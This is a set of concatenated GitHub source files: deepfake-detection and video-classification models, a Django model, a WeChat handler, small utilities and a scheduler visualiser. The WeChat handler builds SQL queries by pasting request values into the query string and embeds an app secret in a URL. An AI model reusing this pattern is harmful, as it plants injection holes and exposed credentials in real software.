num_pcs):\n #storing the accuracy for the 0,1,2,3 fake cases\n result = np.zeros((1,4))\n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n cam1_dist = mahalanobis_calculate(data2['cam1'][:fullLen,:], num_pcs)\n cam2_dist = mahalanobis_calculate(data2['cam2'][:fullLen,:], num_pcs)\n cam3_dist = mahalanobis_calculate(data2['cam3'][:fullLen,:], num_pcs)\n cam4_dist = mahalanobis_calculate(data2['cam4'][:fullLen,:], num_pcs)\n cam5_dist = mahalanobis_calculate(data2['cam5'][:fullLen,:], num_pcs)\n cam6_dist = mahalanobis_calculate(data2['cam6'][:fullLen,:], num_pcs)\n fake2_dist = mahalanobis_calculate(data2['fake'][:fullLen,:], num_pcs)\n fake3_dist = mahalanobis_calculate(data3['fake'][:fullLen,:], num_pcs)\n fake4_dist = mahalanobis_calculate(data4['fake'][:fullLen,:], num_pcs)\n \n \n X0 = np.array([cam1_dist, cam2_dist, cam3_dist, cam4_dist, cam5_dist, cam6_dist])\n X1 = np.array([cam1_dist, cam2_dist, cam3_dist, fake4_dist, cam5_dist, cam6_dist])\n X2 = np.array([cam1_dist, cam2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n X3 = np.array([cam1_dist, fake2_dist, fake3_dist, fake4_dist, cam5_dist, cam6_dist])\n \n return clusterHelper(X0, X1, X2, X3, thresh, result)\n \n \n \n\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='DeepFake Detection Experiment')\n\n parser.add_argument('--data-dir', type=str, default='Data',\n help='Directory where processed landmark files live')\n parser.add_argument('--num_pcs', type=int, default=5,\n help='Number of principal components to use')\n parser.add_argument('--threshold', type=float, default=1.3,\n help='Cluster threshold')\n parser.add_argument('--num_participants', type=int, default=25,\n help='Number of participants')\n \n \n args = parser.parse_args()\n return args\n\n\n\n\ndef main():\n args = parse_args()\n \n # There is no data for ID 17\n if args.num_participants >= 17:\n averagePCA = np.zeros((args.num_participants-1, 4))\n averageSimple = np.zeros((args.num_participants-1, 4))\n else:\n averagePCA = np.zeros((args.num_participants, 4))\n averageSimple = np.zeros((args.num_participants, 4))\n \n \n for i in range(args.num_participants):\n \n # There is no data for ID 17\n if i == 16:\n continue\n \n \n data2 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake2-ID{i+1}.mat'))\n data3 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake3-ID{i+1}.mat'))\n data4 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake4-ID{i+1}.mat'))\n \n resultPCA = socialVerificationOnlyPCA(data2,data3,data4,args.threshold, args.num_pcs)\n \n resultSimple = socialVerificationNoPCA(data2,data3,data4, args.threshold)\n \n print(f'Iteration: {i+1}. PCA Result: {resultPCA}')\n print(f'Iteration: {i+1}. 
SimpleMethod Result: {resultSimple}')\n \n # There is no data for ID 17\n if i > 16:\n averagePCA[i-1] = resultPCA\n averageSimple[i-1] = resultSimple\n \n else:\n averagePCA[i] = resultPCA\n averageSimple[i] = resultSimple\n \n print(f'Average accuracy PCA: {np.mean(averagePCA, axis = 0)}')\n print(f'Average accuracy No PCA: {np.mean(averageSimple, axis = 0)}')\n\n\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"brownvc/social-video-verification-hackathon","sub_path":"code/full_sequence_exp.py","file_name":"full_sequence_exp.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73694609424","text":"\"\"\"Abstract model for connections.\"\"\"\nfrom typing import Dict\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom ontask.models.common import NameAndDescription\nfrom ontask.models.logs import Log\n\n\nclass Connection(NameAndDescription):\n \"\"\"Model representing a connection to a data source.\n\n @DynamicAttrs\n \"\"\"\n\n # Boolean that enables the use of this connection to other users.\n enabled = models.BooleanField(\n default=False,\n verbose_name=_('Available to users?'),\n null=False,\n blank=False)\n\n optional_fields = []\n\n @classmethod\n def get(cls, primary_key):\n \"\"\"Get the object with the given PK. Must be overwritten.\"\"\"\n raise NotImplementedError\n\n def __str__(self):\n \"\"\"Render with name field.\"\"\"\n return self.name\n\n def has_missing_fields(self) -> bool:\n \"\"\"Check if the connection has any parameter missing\"\"\"\n return any(\n not bool(getattr(self, field_name))\n for field_name in self.optional_fields)\n\n def get_missing_fields(self, form_values: Dict) -> Dict:\n \"\"\"Get the missing fields from the given form\"\"\"\n to_return = {}\n for fname in self.optional_fields:\n to_return[fname] = getattr(self, fname)\n if not to_return[fname]:\n to_return[fname] = form_values[fname]\n return to_return\n\n def get_display_dict(self) -> Dict:\n \"\"\"Create dictionary with (verbose_name, value)\"\"\"\n return {\n self._meta.get_field(key.name).verbose_name.title():\n self.__dict__[key.name]\n for key in self._meta.get_fields()\n if key.name != 'id'}\n\n def log(self, user, operation_type: str, **kwargs) -> int:\n \"\"\"Function to register an event.\"\"\"\n return Log.objects.register(\n self,\n user,\n operation_type,\n None,\n kwargs)\n\n class Meta:\n \"\"\"Define as abstract and the ordering criteria.\"\"\"\n\n abstract = True\n ordering = ['name']\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/models/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"37412739056","text":"import torch\r\nfrom torch import nn\r\nimport efficient\r\nfrom torchsummary import summary\r\n\r\n'''\r\n 基础模块定义\r\n'''\r\n\r\n\r\nclass VggBlock(nn.Module):\r\n def __init__(self, in_ch, out_ch, num_lay):\r\n super(VggBlock, self).__init__()\r\n net = []\r\n for i in range(num_lay):\r\n if i == 0:\r\n net.append(\r\n nn.Conv3d(in_channels=in_ch, out_channels=out_ch, kernel_size=(1, 3, 3), stride=(1, 1, 1),\r\n padding=(0, 1, 1))\r\n )\r\n else:\r\n net.append(\r\n nn.Conv3d(in_channels=out_ch, out_channels=out_ch, kernel_size=(1, 3, 3), stride=(1, 1, 1),\r\n padding=(0, 1, 1))\r\n )\r\n net.append(nn.BatchNorm3d(out_ch))\r\n net.append(nn.ReLU(inplace=True))\r\n 
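# The (1, 2, 2) max-pool below halves H and W at the end of each block, while its unit kernel and stride along the depth axis keep the temporal dimension unchanged.\r\n        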
net.append(\r\n nn.MaxPool3d(kernel_size=(1, 2, 2), padding=(0, 0, 0), stride=(1, 2, 2), ceil_mode=False)\r\n )\r\n self.vgg_block = nn.Sequential(*net)\r\n\r\n def forward(self, x):\r\n return self.vgg_block(x)\r\n\r\n\r\nclass Vgg193d_contour(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_contour, self).__init__()\r\n self.block1 = VggBlock(in_ch=1, out_ch=64, num_lay=1)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=1)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=1)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=1)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=1)\r\n\r\n def forward(self, x):\r\n out1 = self.block1(x)\r\n out2 = self.block2(out1)\r\n out3 = self.block3(out2)\r\n out4 = self.block4(out3)\r\n out5 = self.block5(out4)\r\n return out1, out2, out3, out4, out5\r\n\r\n\r\nclass Vgg193d_space(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_space, self).__init__()\r\n self.block1 = VggBlock(in_ch=3, out_ch=64, num_lay=2)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=2)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=3)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=3)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=3)\r\n\r\n def forward(self, x):\r\n out1 = self.block1(x)\r\n out2 = self.block2(out1)\r\n out3 = self.block3(out2)\r\n out4 = self.block4(out3)\r\n out5 = self.block5(out4)\r\n return out5\r\n\r\n\r\nclass Channel_Attention(nn.Module):\r\n def __init__(self):\r\n super(Channel_Attention, self).__init__()\r\n self.sig = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n attention = self.sig(torch.mean(x, dim=(2, 3))).unsqueeze(-1).unsqueeze(-1).expand(x.shape)\r\n return attention\r\n\r\n\r\nclass model_Efficient(nn.Module):\r\n def __init__(self, in_channels):\r\n super(model_Efficient, self).__init__()\r\n self.effect = efficient.efficientnetv2_l()\r\n\r\n def forward(self, x):\r\n return self.effect(x)\r\n\r\n\r\nclass Vgg193d_contour_space(nn.Module):\r\n def __init__(self):\r\n super(Vgg193d_contour_space, self).__init__()\r\n self.vgg_contour = Vgg193d_contour()\r\n self.block1 = VggBlock(in_ch=3, out_ch=64, num_lay=2)\r\n self.block2 = VggBlock(in_ch=64, out_ch=128, num_lay=2)\r\n self.block3 = VggBlock(in_ch=128, out_ch=256, num_lay=4)\r\n self.block4 = VggBlock(in_ch=256, out_ch=512, num_lay=4)\r\n self.block5 = VggBlock(in_ch=512, out_ch=512, num_lay=4)\r\n\r\n def forward(self, x_contour, x_face):\r\n out1_c, out2_c, out3_c, out4_c, out5_c = self.vgg_contour(x_contour)\r\n out1 = self.block1(x_face)\r\n out2 = self.block2(out1 + out1_c)\r\n out3 = self.block3(out2 + out2_c)\r\n out4 = self.block4(out3 + out3_c)\r\n out5 = self.block5(out4 + out4_c)\r\n out = out5 + out5_c\r\n return out.permute((0, 2, 1, 3, 4))\r\n\r\n\r\n'''\r\n 模型组合\r\n'''\r\n\r\n\r\nclass vgg193d_lstm(nn.Module):\r\n def __init__(self, in_channels):\r\n super(vgg193d_lstm, self).__init__()\r\n self.vgg_space = Vgg193d_contour_space()\r\n self.lstm = nn.LSTM(input_size=512 * 3 * 3, hidden_size=1000, num_layers=3, batch_first=True,\r\n bidirectional=False, dropout=0.3)\r\n self.outLay_lstm = nn.Sequential(\r\n nn.Flatten(),\r\n nn.Linear(1000 * in_channels, 1000)\r\n )\r\n self.TemporalAttention = nn.Sequential(\r\n nn.Linear(8, 4),\r\n nn.ReLU(),\r\n nn.Linear(4, 8)\r\n )\r\n self.sig = nn.Sigmoid()\r\n\r\n def forward(self, x_contour, x_face):\r\n out_vgg = self.vgg_space(x_contour, x_face)\r\n b, t, c, w, h = out_vgg.shape\r\n out_vgg = out_vgg.reshape((b, t, -1))\r\n time_attention = 
torch.mean(out_vgg, dim=2)\r\n time_attention = self.sig(self.TemporalAttention(time_attention))\r\n out_vgg = time_attention.unsqueeze(2).expand(out_vgg.shape) * out_vgg\r\n out, (c, h) = self.lstm(out_vgg)\r\n # out = time_attention.expand(out.shape) * out\r\n return self.outLay_lstm(out)\r\n\r\n\r\nclass vgg193d_LSTM_Efficient(nn.Module):\r\n def __init__(self, in_channels):\r\n super(vgg193d_LSTM_Efficient, self).__init__()\r\n self.STNet = vgg193d_lstm(in_channels=in_channels)\r\n self.FTNet = model_Efficient(in_channels=in_channels)\r\n self.outLay = nn.Sequential(\r\n nn.Linear(2000, 1000),\r\n nn.ReLU(),\r\n nn.Linear(1000, 2)\r\n )\r\n\r\n def forward(self, X):\r\n x_contour, x_face = X[:, 3, :, :, :].unsqueeze(1), X[:, 0:3, :, :, :]\r\n b, c, t, h, w = x_face.shape\r\n out_STNet = self.STNet(x_contour, x_face)\r\n out_FTNet = self.FTNet(x_face.reshape((b, t * c, w, h)))\r\n print(out_STNet.shape)\r\n print(out_FTNet.shape)\r\n return self.outLay(torch.cat((out_STNet, out_FTNet), dim=1))\r\n\r\n\r\nif __name__ == '__main__':\r\n a = torch.randn((4, 4, 8, 112, 112))\r\n net = vgg193d_LSTM_Efficient(in_channels=8)\r\n b = net(a)\r\n print(net)\r\n print(b.shape)\r\n summary(net, a)\r\n","repo_name":"muzixingyun/SFTNet","sub_path":"SFTNet/SFTNet.py","file_name":"SFTNet.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"72307821906","text":"from .cite import join_nums_and_pairs\n\n\ncojesuschrist_base = 'https://www.churchofjesuschrist.org/study/scriptures/'\n\n\ndef embed_html(ref, inner):\n return f'
{inner}'\n\n\ndef embed_markdown(ref, inner):\n return f'[{inner}]({ref})'\n\n\ndef make_churchofjesuschrist(book, chapter, verses):\n book_slug = book.slug.lower().replace(' ', '-').replace('&', '')\n if verses:\n first_verse_item = verses[0]\n first_verse = first_verse_item if isinstance(first_verse_item, int) else first_verse_item[0]\n fragment = '#p%d' % (first_verse - 1) if first_verse > 1 else ''\n verses = '.' + join_nums_and_pairs(verses, ',')\n else:\n verses = fragment = ''\n return f'{cojesuschrist_base}{book.collection_key}/{book_slug}/{chapter}{verses}?lang=eng{fragment}'\n\n\ndef make_short_ref(book, chapter, verses):\n verses = ':' + join_nums_and_pairs(verses, ', ') if verses else ''\n return f'{book.slug} {chapter}{verses}'\n\n\ndef make_long_ref(book, chapter, verses):\n verses = ':' + join_nums_and_pairs(verses, ', ') if verses else ''\n return f'{book.title} {chapter}{verses}'\n\n\n# ------------ keep this block vvv at the bottom of the module --------------\n\n# We want this at the bottom of the module because it uses python reflection\n# to scan all the code that precedes it, and builds a list of all the functions\n# that match a certain pattern. This allows us to add new citation styles by\n# simply adding the relevant functions above, without manually updating a list\n# of the styles we have.\ng = globals()\nall_makers = [key for key in g.keys() if key.startswith('make_') and callable(g[key])]\ndel g\n\n\ndef print_all(book, chapter, verses):\n g = globals()\n for key in all_makers:\n print(key[5:].replace('_', ' '))\n func = g[key]\n print(' %s\\n' % func(book, chapter, verses))\n\n print('html\\n ' + embed_html(make_churchofjesuschrist(book, chapter, verses),\n make_short_ref(book, chapter, verses)) + '\\n')\n print('markdown\\n ' + embed_markdown(make_churchofjesuschrist(book, chapter, verses),\n make_short_ref(book, chapter, verses)) + '\\n')\n\n# ------------ keep this block ^^^ at the bottom of the module --------------\n","repo_name":"dhh1128/cite2link","sub_path":"cite2link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42557339839","text":"# _*_ coding:utf-8 _*_\nfrom __future__ import print_function\nfrom baseresource.greenresource import BaseResource\nfrom lxml import etree\nimport random\nimport logging\nfrom config.default import appId\nfrom WXBizDataCrypt import WXBizDataCrypt\nimport json\nimport requests\nfrom common.function import timestamp_to_date, get_day\nfrom database.mysql import MysqlDB\nimport ujson\n\n\nclass AuthWeiXin(BaseResource):\n\n back_data = [\"我是智能\", \"你好\", \"你是\"]\n data_length = 0\n def __init__(self, back_data):\n BaseResource.__init__(self)\n self.back_data = back_data\n self.data_length = len(self.back_data)\n def real_POST(self, request):\n receiveData = request.content.read() #获取微信发送过来的body\n print(receiveData)\n data = etree.fromstring(receiveData)\n ToUserName = data.find('ToUserName').text\n FromUserName = data.find('FromUserName').text\n CreateTime = data.find('CreateTime').text\n Content = data.find('Content').text\n print(Content)\n Content = self.back_data[random.randint(0,self.data_length-1)]\n Content = Content.strip('\\n')\n # print(receiveData)\n message = '%s'%(FromUserName, ToUserName, CreateTime, Content)\n print(message)\n return message\n def real_GET(self, request):\n try:\n echostr = request.args.get('echostr')[0]\n return echostr\n except Exception as e:\n 
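# WeChat endpoint verification: the platform issues a GET carrying an echostr query parameter and expects it echoed back unchanged, so a request without echostr falls through to this handler.\n            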
logging.info(\"访问错误\")\n print(\"微信验证失败\")\n return \"非法访问\"\n\nclass WXRunData(BaseResource):\n\n def real_POST(self, request):\n nickName = request.args.get('nickName')[0]\n rundata = request.args.get('rundata')[0]\n code = request.args.get('code')[0]\n avatarUrl = request.args.get('avatarUrl')[0]\n logging.info(avatarUrl)\n iv = request.args.get('iv')[0]\n logging.info('iv=%s' % iv)\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid=%s&secret=ddf03c948cfe2610dd8d1ae125b212ea&' \\\n 'js_code=%s&grant_type=authorization_code' % (appId, code)\n res = requests.get(url)\n logging.info(res.content)\n content = json.loads(res.content)\n sessionKey = content['session_key']\n openid = content['openid']\n logging.info(sessionKey)\n pc = WXBizDataCrypt(appId, sessionKey)\n logging.info(\"rundata = %s\" % rundata)\n data = pc.decrypt(rundata, iv)\n for item in data:\n timestamp = timestamp_to_date(item['timestamp'])\n step = item['step']\n logging.info(\"%s %s \" % (timestamp, step))\n run_day = get_day(item['timestamp'])\n logging.info(\"insert into rundata(openid,step,runday,nickname) value\"\n \" ('%s',%s,'%s','%s') on DUPLICATE key update step=%s , avatarUrl='%s'\" % (openid, step,run_day, nickName, step, avatarUrl))\n MysqlDB.insert(\n \"insert into rundata(openid,step,runday,nickname) value\"\n \" ('%s',%s,'%s','%s') on DUPLICATE key update step=%s , avatarUrl='%s'\" % (openid, step,run_day, nickName, step, avatarUrl))\n\n logging.info(\"nickname = %s\" % nickName)\n resp = {'openid': openid, 'code': 0}\n return resp\n def real_GET(self, request):\n nickName = request.args.get('nickName')[0]\n rundata = request.args.get('rundata')[0]\n code = request.args.get('sessionKey')[0]\n\n iv = request.args.get('iv')[0]\n logging.info('iv=%s' % iv)\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid=%s&secret=ddf03c948cfe2610dd8d1ae125b212ea&' \\\n 'js_code=%s&grant_type=authorization_code' % (appId, code)\n res = requests.get(url)\n content = json.loads(res.content)\n sessionKey = content['session_key']\n pc = WXBizDataCrypt(appId, sessionKey)\n data = pc.decrypt(rundata, iv)\n for item in data:\n timestamp = timestamp_to_date(item['timestamp'])\n step = item['step']\n logging.info(\"%s %s \" %(timestamp, step))\n logging.info(\"nickname %s\" % nickName)\n logging.info(nickName)\n return \"success\"","repo_name":"HSATAN/xiaochengxu","sub_path":"api/weixin/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21315706362","text":"class UndergroundSystem:\n\n def __init__(self):\n self.checkin = {}\n self.traveltimes = {} \n\n def checkIn(self, id: int, stationName: str, t: int) -> None:\n self.checkin[id] = (stationName , t)\n\n def checkOut(self, id: int, stationName: str, t: int) -> None:\n startstation , starttime = self.checkin[id]\n traveltime = t - starttime\n key = (startstation , stationName)\n if key in self.traveltimes:\n totaltime , count = self.traveltimes[key]\n self.traveltimes[key] = (totaltime + traveltime , count +1)\n else:\n self.traveltimes[key] = (traveltime , 1)\n del self.checkin[id]\n\n def getAverageTime(self, startStation: str, endStation: str) -> float:\n key = (startStation , endStation)\n totaltime , count = self.traveltimes[key]\n return totaltime / count\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\n# obj = UndergroundSystem()\n# obj.checkIn(id,stationName,t)\n# obj.checkOut(id,stationName,t)\n# 
param_3 = obj.getAverageTime(startStation,endStation)","repo_name":"AkRockBoy/Leetcode-Solutions","sub_path":"1396-design-underground-system/1396-design-underground-system.py","file_name":"1396-design-underground-system.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43700676006","text":"from cslvr import *\n\n# directories for loading or saving data :\nmsh_dir = './dump/meshes/' # directory where the mesh is located\nout_dir = './dump/vars/' # directory to save initialization\n\nthklim = 1.0 # [m] thickness limit\nL = 800000.0 # [m] mesh radius\nRel = 450000 # [m] radial distance at which S_ring becomes negative\ns = 1e-5 # [a^{-1}] accumulation/ablation coefficient\nTmin = 238.15 # [K] minimum temperature (located at divide)\nSt = 1.67e-5 # [K m^{-1}] lapse rate\n\n# load the mesh that was generated by gen_cylinder.py :\nmesh = Mesh(msh_dir + 'cylinder_mesh.xml.gz')\n\n# these are the mesh attributes which we use to deform :\nxmin = -L\nxmax = L\nymin = -L\nymax = L\n\n# width and origin of the domain for deforming x coord :\nwidth_x = xmax - xmin\noffset_x = xmin\n\n# width and origin of the domain for deforming y coord :\nwidth_y = ymax - ymin\noffset_y = ymin\n\n# iterate through the mesh coordinates and alter the horizontal components :\nfor x in mesh.coordinates():\n x[0] = x[0] * width_x # transform x\n x[1] = x[1] * width_y # transform y\n\n# initialize the model :\nmodel = D3Model(mesh, out_dir=out_dir, use_periodic=False)\n\n# form the 2D upper-surface mesh :\nmodel.form_srf_mesh()\n\n# form a 2D model using the upper-surface mesh :\nsrfmodel = D2Model(model.srfmesh,\n out_dir = out_dir,\n use_periodic = False,\n kind = 'submesh')\n\n# generate the map between the 3D and 2D models :\nmodel.generate_submesh_to_mesh_map(sub_model=srfmodel)\n\nfrom cslvr import *\n\n# set the output directory :\nin_dir = './vars/'\nmsh_dir = './meshes/'\nout_dir = in_dir\n\n# retrieve the domain contour\ncontour = np.loadtxt(msh_dir + 'contour.txt')\n\nf = HDF5File(mpi_comm_world(), in_dir + 'state.h5', 'r')\nfn = HDF5File(mpi_comm_world(), in_dir + 'submeshes.h5', 'w')\n\nmodel = D3Model(mesh=f, out_dir=out_dir)\n\nmodel.form_bed_mesh()\nmodel.form_srf_mesh()\nmodel.form_lat_mesh()\nmodel.form_dvd_mesh(contour)\n\nmodel.save_bed_mesh(fn)\nmodel.save_srf_mesh(fn)\nmodel.save_lat_mesh(fn)\nmodel.save_dvd_mesh(fn)\n\nfn.close()\n\n","repo_name":"pf4d/cslvr","sub_path":"simulations/eismint_ii/gen_submeshes.py","file_name":"gen_submeshes.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"41785785969","text":"from urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\ndef getTitle(url):\n\ttry:\n\t\thtml = urlopen(url)\n\texcept HTTPError as err:\n\t\tprint(err)\n\texcept URLError as err:\n\t\tprint('no server found or URL mistyped')\n\ttry:\n\t\tbs = BeautifulSoup(html.read(), 'lxml')\n\t\ttitle = bs.body.h1\n\texcept AttributeError as err:\n\t\tprint('tag not found')\n\treturn title\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title == None:\n\tprint('title not 
found')\nelse:\n\tprint(title)","repo_name":"jaikobustin/python_webscraper","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17485883419","text":"from contextlib import contextmanager\nfrom typing import Any, ContextManager, Dict, Literal\n\nfrom cjwstate.models.workflow import Workflow\nfrom django.db import transaction\n\nfrom .types import HandlerError\n\n\ndef is_workflow_authorized(\n workflow: Workflow, scope: Dict[str, Any], role: Literal[\"read\", \"write\", \"owner\"]\n) -> None:\n \"\"\"Return whether user+session+has_secret can access Workflow.\n\n This queries the database. Call it within database_sync_to_async().\n \"\"\"\n user = scope[\"user\"]\n session = scope[\"session\"]\n\n if role == \"read\":\n # If the user supplied a secret and then got here, the user is authorized\n has_secret = isinstance(\n scope[\"url_route\"][\"kwargs\"][\"workflow_id_or_secret_id\"], str\n )\n return has_secret or workflow.user_session_authorized_read(user, session)\n elif role == \"write\":\n return workflow.user_session_authorized_write(user, session)\n elif role == \"owner\":\n return workflow.user_session_authorized_owner(user, session)\n\n\n@contextmanager\ndef lock_workflow_for_role(\n workflow: Workflow, scope: Dict[str, Any], role: Literal[\"read\", \"write\", \"owner\"]\n) -> ContextManager:\n \"\"\"Update Workflow, authenticate and yield; or raise HandlerError.\n\n Raise HandlerError if workflow does not exist.\n\n Raise HandlerError if request scope is not allowed role.\n\n This must be called in synchronous database code. The yielded block will\n run within a transaction in which `workflow` is guaranteed not to be\n written by any other processes.\n \"\"\"\n with transaction.atomic():\n try:\n # Lock the workflow, in the database.\n # This will block until the workflow is released.\n # https://docs.djangoproject.com/en/2.0/ref/models/querysets/#select-for-update\n #\n # list() executes the query\n list(Workflow.objects.select_for_update().filter(id=workflow.id))\n except Workflow.DoesNotExist:\n raise HandlerError(\"Workflow.DoesNotExist\")\n # save() overwrites all fields, so make sure we have the latest\n # versions.\n # https://code.djangoproject.com/ticket/28344#comment:10\n workflow.refresh_from_db() # won't fail: we're locked\n\n if not is_workflow_authorized(workflow, scope, role):\n raise HandlerError(\"AuthError: no %s access to workflow\" % (role,))\n\n yield\n","repo_name":"CJWorkbench/cjworkbench","sub_path":"server/handlers/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"48"} +{"seq_id":"72738351185","text":"from PIL import Image, ImageDraw, ImageFont\nfrom processo import Processo\nfrom cores import Cores\n\nimport os.path\nimport io\nimport base64\n\nclass Caixa:\n width = 80\n height = 50\n \n def __init__(self, dr, pos, processo, cor=\"white\"):\n self.dr = dr\n self.pos = pos\n self.x, self.y = pos\n self.processo = processo\n \n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'FreeSansBold.ttf')\n fonte_caixa = ImageFont.truetype(fn, 11)\n \n nova_pos = ((self.x, self.y), (self.x + Caixa.width, self.y + Caixa.height))\n dr.rectangle(nova_pos, fill=cor if processo is not None else \"white\", outline=\"black\")\n \n #dr.text((self.x + Caixa.width/3, self.y + Caixa.height/3), processo, 
fill=\"black\")\n \n #Solucao porca:\n if processo is not None:\n dr.text((self.x+2, self.y+2), \"PID: \"+str(processo.pid), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10), \"Tempo R.: \"+str(processo.tempo_restante), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10*2), \"Tempo T.: \"+str(processo.tempo_necessario), fill=\"black\", font=fonte_caixa)\n dr.text((self.x+2, self.y+10*3), \"Memo.: \"+str(processo.memoria_necessaria), fill=\"black\", font=fonte_caixa)\n\nclass Desenho():\n \n def __init__(self, escalonador):\n fila = escalonador.aptos if escalonador.algoritimo != \"Fila de Prioridade com RoundRobin\" else escalonador.filas\n self.quantum = escalonador.quantum\n self.algoritimo = escalonador.algoritimo\n self.cores = escalonador.cores\n self.RAM = escalonador.memoria.RAM\n self.fila_aptos = fila\n \n self.tamanho_fila = len(self.fila_aptos)\n self.tamanho_fonte = 12\n self.isFilaPrioridade = True if self.algoritimo == \"Fila de Prioridade com RoundRobin\" else False\n \n self.multiplicador = 4 if self.isFilaPrioridade else 1\n tamanho_multiplicador = 10 if self.multiplicador == 4 else 1 #Gambiarra\n \n self.x = 1200\n \n self.max_filas = (1200 / Caixa.width) - 2 #Calculado a partir de muitas e muitas tentativas\n self.y = (130 + self.tamanho_fonte + (self.tamanho_fila / self.max_filas + 1) \\\n * Caixa.height * tamanho_multiplicador) + 100\n \n self.im = Image.new('RGB', (self.x, self.y), \"white\")\n self.dr = ImageDraw.Draw(self.im)\n \n #print \"Chegou ate aqui...\"\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'FreeSansBold.ttf')\n self.fonte = ImageFont.truetype(fn, self.tamanho_fonte)\n self.fonte_titulo = ImageFont.truetype(fn, 22)\n \n self.dr.setfont(self.fonte)\n \n def draw(self):\n dr = self.dr\n \n dr.text((5, 5), \"Quantum: \"+str(self.quantum), fill=\"black\")\n dr.text((self.x/2, 5), self.algoritimo, fill=\"black\", font=self.fonte_titulo)\n dr.text((30, 35+self.tamanho_fonte), \"Cores:\", fill=\"black\")\n \n #Desenha os cores\n pos = 0\n for i in self.cores.cores:\n if(i == None):\n Caixa(dr, (35+pos*Caixa.width, 60), None, \"#00FF00\")\n else:\n Caixa(dr, (35+pos*Caixa.width, 60), i, \"#00FF00\")\n pos += 1\n\n #Desenha a Memoria Virtual\n blocos_ram = len(self.RAM.pos)\n pos_inicial = 70+Caixa.height\n dr.text((30, pos_inicial), \"Memoria Virtual (RAM):\", fill=\"black\")\n #dr.text((blocos_ram * Caixa.width + 60, pos_inicial), \"Disco:\", fill=\"black\")\n\n for pos in range(blocos_ram):\n Caixa(dr, (35+pos*Caixa.width, pos_inicial+15), self.RAM.pos[pos].conteudo, \"#FFFFFF\")\n tamanho = self.RAM.pos[pos].tamanho\n dr.text(((35+pos*Caixa.width)+(Caixa.width / 3.), pos_inicial+15+Caixa.height+5), str(tamanho)+\"KB\", fill=\"black\")\n\n pos_inicial += 40 + Caixa.height\n dr.text((30, pos_inicial), \"Fila de aptos:\", fill=\"black\") #Ta certo...\n \n m = self.max_filas\n\n #Desenha a fila de aptos\n fila = [self.fila_aptos] if not self.isFilaPrioridade else self.fila_aptos\n for k in range(self.multiplicador):\n tamanho = len(fila[k])\n for i in range(tamanho/m + 1):\n if tamanho < m:\n aux = tamanho\n else:\n aux = m\n tamanho -= m\n \n cont = 0\n for j in range(aux):\n Caixa(dr, (30+j*Caixa.width, \n ((pos_inicial + 5) + 35 * k * 2) \\\n + self.tamanho_fonte+i*Caixa.height), fila[k][cont], \"#FF5252\")\n cont += 1\n \n self.quantum += 1\n \n #Salva a imagem\n output = io.BytesIO()\n self.im.save(output, format='JPEG')\n binary = output.getvalue()\n encoded = base64.b64encode(binary)\n return 
